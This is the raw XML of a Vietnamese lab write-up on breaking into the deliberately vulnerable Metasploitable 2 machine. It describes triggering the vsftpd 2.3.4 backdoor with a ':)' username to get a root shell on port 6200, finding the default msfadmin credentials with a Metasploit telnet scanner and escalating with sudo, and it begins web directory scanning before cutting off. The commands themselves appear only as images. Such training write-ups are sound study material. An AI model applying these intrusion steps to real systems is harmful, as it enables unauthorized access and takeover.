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00B7" w14:textId="6D6ECBCB" w:rsidR="00EE22A8" w:rsidRDefault="002A1C57" w:rsidP="00EE22A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lab1</w:t>
      </w:r>
      <w:r w:rsidR="00EE22A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002A1C57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD026D9" w14:textId="77777777" w:rsidR="00EE22A8" w:rsidRPr="004D06BB" w:rsidRDefault="00EE22A8" w:rsidP="00EE22A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D06BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mô tả: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096D5C9" w14:textId="3FBB5541" w:rsidR="00EE22A8" w:rsidRDefault="00EE22A8" w:rsidP="00EE22A8">
      <w:r w:rsidRPr="00EE22A8">
        <w:t>Nguồn: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00EE22A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://community.rapid7.com/community/metasploit/blog/2012/06/12/introducing-metasploitable-2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55943272" w14:textId="77777777" w:rsidR="00EE22A8" w:rsidRDefault="00EE22A8" w:rsidP="00EE22A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3160229F" w14:textId="77777777" w:rsidR="00EE22A8" w:rsidRDefault="00EE22A8" w:rsidP="00EE22A8">
      <w:r>
        <w:t>Trước tiên thực hiện dò quét các port trong dải địa chỉ 10.10.10 để tìm kiếm địa chỉ ip của bài lab cần thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB31BB" w14:textId="052C4EA2" w:rsidR="0002152D" w:rsidRDefault="00872E89">
      <w:r w:rsidRPr="00872E89">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD141CB" wp14:editId="48BA4EEC">
            <wp:extent cx="5731510" cy="3230880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="10388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9563" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3230880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A04A536" w14:textId="6BAA1D24" w:rsidR="00872E89" w:rsidRDefault="00872E89">
      <w:r w:rsidRPr="00872E89">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="782CE570" wp14:editId="73F22829">
            <wp:extent cx="5731510" cy="2891790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1635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03" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2891790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="700A16F7" w14:textId="5898DA44" w:rsidR="00872E89" w:rsidRDefault="00872E89">
      <w:r w:rsidRPr="00872E89">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AFA4B86" wp14:editId="71B96545">
            <wp:extent cx="5731510" cy="3157855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="16826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0766" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3157855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D6BCCB" w14:textId="77777777" w:rsidR="00672E75" w:rsidRDefault="00672E75"/>
    <w:p w14:paraId="5F95F821" w14:textId="11A99A49" w:rsidR="00672E75" w:rsidRDefault="00672E75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thực hiện khai thác ftp ở cổng 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9257EB" w14:textId="5B2C13DF" w:rsidR="00672E75" w:rsidRDefault="00672E75">
      <w:r>
        <w:t xml:space="preserve">Dựa trên nmap, ftp hiện tại ở phiên bản </w:t>
      </w:r>
      <w:r w:rsidR="006940F7" w:rsidRPr="006940F7">
        <w:t>vsftpd 2.3.</w:t>
      </w:r>
      <w:r w:rsidR="006940F7">
        <w:t xml:space="preserve">4, từ đây tìm kiếm các lỗ hổng ở phoeen bản </w:t>
      </w:r>
      <w:r w:rsidR="00C443E2">
        <w:t>này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A84C9B" w14:textId="2CF63C3E" w:rsidR="00C443E2" w:rsidRDefault="00C443E2">
      <w:r w:rsidRPr="00C443E2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D71D83B" wp14:editId="17F19F3B">
            <wp:extent cx="5731510" cy="1105535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2093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449" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1105535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2868A8" w14:textId="67C0EE35" w:rsidR="00C443E2" w:rsidRDefault="00C443E2">
      <w:r>
        <w:t xml:space="preserve">Kết quả cho thấy phiên </w:t>
      </w:r>
      <w:r w:rsidR="00E70974">
        <w:t>bản này tồn tại backdoor cho phép thực thi lệnh command. Từ đây lấy file khai thác về:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9F5747" w14:textId="2001314F" w:rsidR="00E70974" w:rsidRDefault="00E70974">
      <w:r w:rsidRPr="00E70974">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68CD66D5" wp14:editId="2AEEEFFE">
            <wp:extent cx="5496692" cy="1743318"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="9266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6734" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5496692" cy="1743318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AACD06" w14:textId="094CDEDB" w:rsidR="00987CB4" w:rsidRDefault="00987CB4">
      <w:r>
        <w:t>Xem mã nguồn của mã khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A98D552" w14:textId="484A3431" w:rsidR="00987CB4" w:rsidRDefault="00987CB4">
      <w:r w:rsidRPr="00987CB4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61C10A19" wp14:editId="74F52E3D">
            <wp:extent cx="5731510" cy="3306445"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="116711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2599" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3306445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="191EEE33" w14:textId="6FEE0C56" w:rsidR="00723D26" w:rsidRDefault="00A64A86">
      <w:r>
        <w:t>Vì đây là một lỗ hổng khá đơn giản nên s</w:t>
      </w:r>
      <w:r w:rsidR="00987CB4">
        <w:t>au khi đọc mã nguồn và kết hợp</w:t>
      </w:r>
      <w:r w:rsidR="000A6EE7">
        <w:t xml:space="preserve"> với các thông tin tìm kiếm về lỗ hổng nay. Thì ta biết được lỗ hổng này</w:t>
      </w:r>
      <w:r w:rsidR="00FA080D">
        <w:t xml:space="preserve"> xảy ra khi người dùng nhập vào username một chuỗi kí tự có kết thúc bằng :), nó sẽ tảoa một </w:t>
      </w:r>
      <w:r w:rsidR="00723D26">
        <w:t xml:space="preserve">backdoor lắng nghe trên cổng 6200. Từ đó chỉ cần truy cập vào cổng 6200 này là sẽ vào được shell của máy chủ. Vì vậy </w:t>
      </w:r>
      <w:r>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidR="00723D26">
        <w:t xml:space="preserve"> sẽ thử thực hiện thủ </w:t>
      </w:r>
      <w:r w:rsidR="0031357D">
        <w:t>công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E7307" w14:textId="68EB4510" w:rsidR="0031357D" w:rsidRDefault="0031357D">
      <w:r>
        <w:t>Thực hiện kết nối ftp với username chứa :) qua telnet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446E3D67" w14:textId="5D1A75F2" w:rsidR="0031357D" w:rsidRDefault="0031357D">
      <w:r w:rsidRPr="0031357D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B2BA293" wp14:editId="3408BD31">
            <wp:extent cx="4344006" cy="2219635"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="158607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9290" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4344006" cy="2219635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5517B6" w14:textId="65A5C3B2" w:rsidR="0031357D" w:rsidRDefault="0031357D">
      <w:r>
        <w:t>Kết nối qua cổng 6200 được mở như đã nói:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A19FD1" w14:textId="27072406" w:rsidR="0031357D" w:rsidRDefault="0031357D">
      <w:r w:rsidRPr="0031357D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57FDC329" wp14:editId="3D34D296">
            <wp:extent cx="3305636" cy="2086266"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="5247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3067" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3305636" cy="2086266"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D2CA13" w14:textId="0D0DA561" w:rsidR="0031357D" w:rsidRDefault="0031357D">
      <w:r>
        <w:t>Kết quả cho biết đã vào được shell dưới user root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A17852C" w14:textId="74149D0E" w:rsidR="00865618" w:rsidRDefault="00865618">
      <w:r>
        <w:t>Thử chạy file khai thác cũng cho kết quả tương tự:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648FC00D" w14:textId="1DC3BA5D" w:rsidR="0024232A" w:rsidRDefault="0024232A">
      <w:r w:rsidRPr="0024232A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78D14538" wp14:editId="5119331F">
            <wp:extent cx="5731510" cy="998220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15733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3220" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="998220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64671777" w14:textId="2550E8BE" w:rsidR="00790630" w:rsidRDefault="00790630">
      <w:r w:rsidRPr="00790630">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BFD813D" wp14:editId="7B773DAC">
            <wp:extent cx="5731510" cy="1117600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="19182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4471" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1117600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="000F4B03" w14:textId="76212862" w:rsidR="0024232A" w:rsidRDefault="0024232A" w:rsidP="0024232A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thực</w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hiện khai thác </w:t>
      </w:r>
      <w:r w:rsidR="002279AB" w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ở cổng </w:t>
      </w:r>
      <w:r w:rsidR="002279AB" w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D7A450" w14:textId="4EE7A375" w:rsidR="0056777F" w:rsidRPr="0056777F" w:rsidRDefault="0056777F" w:rsidP="0024232A">
      <w:r>
        <w:t>Sử dụng chức năng tự động scan dịch vụ telnet của metasploit và kiểm tra options của nó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075F1C33" w14:textId="0A2FCB88" w:rsidR="00622562" w:rsidRDefault="00622562" w:rsidP="0024232A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="669FE843" wp14:editId="11302BDC">
            <wp:extent cx="5731510" cy="1965960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18127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7363" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1965960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBD016F" w14:textId="5EB3E4F5" w:rsidR="0056777F" w:rsidRPr="0056777F" w:rsidRDefault="0056777F" w:rsidP="0024232A">
      <w:r>
        <w:t>Vì rhost chưa có nên cần thiết lập rhost là địa chỉ ip máy mục tiêu và chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5843FF9B" w14:textId="77777777" w:rsidR="0056777F" w:rsidRDefault="0056777F" w:rsidP="0024232A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B099F6" w14:textId="1EDADE28" w:rsidR="0024232A" w:rsidRDefault="003C20E1">
      <w:r w:rsidRPr="003C20E1">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D896378" wp14:editId="1A9DE38B">
            <wp:extent cx="5731510" cy="1461135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="20882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0646" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1461135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91D395" w14:textId="24FF44C3" w:rsidR="0072242F" w:rsidRDefault="0056777F">
      <w:r>
        <w:t xml:space="preserve">Kết quả phát hiện có username và password cùng là </w:t>
      </w:r>
      <w:r w:rsidR="0072242F">
        <w:t>msfadmin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA5DBE" w14:textId="61FC954A" w:rsidR="0072242F" w:rsidRDefault="0072242F">
      <w:r>
        <w:t>Thực hiện kết nối tới máy lab qua telnet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF49BA" w14:textId="3B9A8FAC" w:rsidR="0072242F" w:rsidRDefault="0072242F">
      <w:r w:rsidRPr="0072242F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33869A4B" wp14:editId="67B39B24">
            <wp:extent cx="5731510" cy="3784600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="9702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9224" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3784600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A79C0" w14:textId="270ADC30" w:rsidR="0072242F" w:rsidRDefault="0072242F">
      <w:r>
        <w:t>Chạy sudo -l thì thấy tài khoản có toàn quyền nên gọi shell của root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A2B210" w14:textId="3B3490A5" w:rsidR="0072242F" w:rsidRDefault="0072242F">
      <w:r w:rsidRPr="0072242F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A9DE307" wp14:editId="4AC01819">
            <wp:extent cx="5731510" cy="775970"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="8554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2176" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="775970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3539BA11" w14:textId="033DE177" w:rsidR="008F7E43" w:rsidRDefault="008F7E43" w:rsidP="008F7E43">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thực hiện khai thác web </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E6FD65" w14:textId="4FA0BBB7" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="008F7E43">
      <w:r>
        <w:t xml:space="preserve">Truy cập vào web: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B7554" w14:textId="7877A3AB" w:rsidR="00996999" w:rsidRDefault="00996999" w:rsidP="008F7E43">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996999">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20CEC771" wp14:editId="2255B00D">
            <wp:extent cx="5731510" cy="3691255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="183528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3890" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3691255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27661C34" w14:textId="546C4438" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="008F7E43">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ở </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trang web có một vài lựa chọn, ở đây mình biết DVWA với Mutillidae là các bài lab để luyện tập về lỗ hổng </w:t>
      </w:r>
      <w:r>
        <w:t>web, tuy nhiên trước khi truy cập vào đó thì mình sẽ quét các tệp và thư mục ẩn trước</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F7675B" w14:textId="24043378" w:rsidR="0072242F" w:rsidRDefault="00996999">
      <w:r w:rsidRPr="00996999">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50375A69" wp14:editId="04B3D114">
            <wp:extent cx="5731510" cy="3738245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18568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9166" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3738245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C48E5D8" w14:textId="498486E3" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
